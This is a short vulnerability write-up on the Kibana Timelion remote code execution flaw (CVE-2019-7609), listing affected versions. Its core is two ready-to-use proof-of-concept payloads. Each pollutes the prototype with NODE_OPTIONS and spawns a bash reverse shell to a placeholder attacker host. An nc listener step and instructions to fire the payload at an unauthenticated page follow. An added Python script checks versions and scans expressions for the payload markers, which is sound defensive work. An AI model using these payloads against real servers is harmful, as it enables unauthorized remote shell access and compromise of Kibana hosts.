Kibana remote code execution vulnerability (CVE-2019-7609)
Vulnerability introduction
An official announcement in February 2019 disclosed a remote code execution vulnerability in Kibana. Kibana versions before 5.6.15 and 6.6.1 contain a flaw in the Timelion visualization tool that allows an attacker to execute arbitrary code on the Kibana server. Kibana is an open source data visualization plugin for Elasticsearch. It is used to search and view the data stored in Elasticsearch indices and to visualize that data as charts, tables, and maps. Because of its convenience, it is widely used in product development.
Scope of impact
Affected versions
Kibana < 5.6.15
Kibana < 6.6.1
Unaffected versions
Kibana = 5.6.15
Kibana >= 6.6.1
POC
```
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash - c \'bash -i>& /dev/tcp/You_VPS/You_VPS_Port 0>&1\'");//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
```

```
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/You_VPS/You_VPS_Port 0>&1");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
```
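
For defenders, the version ranges and the markers visible in the PoC above (a `__proto__` key inside a Timelion expression, `NODE_OPTIONS`, `/proc/self/environ`) can be turned into a quick triage check. The Python below is an added example, not part of the original write-up or of Kibana; the function names and sample expressions are constructed for illustration, and 5.x releases later than 5.6.15 are assumed to be fixed.

```python
import re

# Fixed releases as stated on this page: 5.6.15 and 6.6.1.
FIXED_5X = (5, 6, 15)
FIXED_6X = (6, 6, 1)

# Markers taken from the PoC on this page: a prototype-chain key inside a
# Timelion expression, the NODE_OPTIONS variable, and the file it points at.
SUSPICIOUS = [
    ("prototype-key", re.compile(r"__proto__")),
    ("node-options", re.compile(r"NODE_OPTIONS", re.I)),
    ("proc-environ", re.compile(r"/proc/self/environ")),
]

def parse_version(text):
    """Turn '6.5.4' or '6.5.4-SNAPSHOT' into (6, 5, 4)."""
    m = re.match(r"^\s*v?(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError(f"unrecognised version: {text!r}")
    return tuple(int(p) for p in m.groups())

def is_affected(version_text):
    """True when the version is below the fixed release of its line."""
    v = parse_version(version_text)
    if v[0] >= 6:
        return v < FIXED_6X
    # Assumption: every release below 5.6.15 counts as affected, as the page states.
    return v < FIXED_5X

def scan_expression(expr):
    """Return the names of the markers found in one Timelion expression."""
    return [name for name, rx in SUSPICIOUS if rx.search(expr)]

# Constructed sample expressions (command body elided on purpose).
SAMPLES = [
    ".es(index=logs-*, metric=count).label('requests')",
    ".es(*).props(label.__proto__.env.AAAA='<elided>')",
    ".props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')",
]

if __name__ == "__main__":
    for ver in ("5.6.14", "5.6.15", "6.5.4", "6.6.1"):
        print(ver, "affected" if is_affected(ver) else "not affected")
    for expr in SAMPLES:
        print(scan_expression(expr) or "clean", "<-", expr)
```

A hit on `prototype-key` alone is worth investigating, since ordinary Timelion expressions have no reason to reference `__proto__`.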
Vulnerability reproduction
Start an nc listener on the attacker machine:
nc -nvlp 1234
Find a page that can be accessed without authorization and execute the shell payload.
The reverse shell connects back successfully.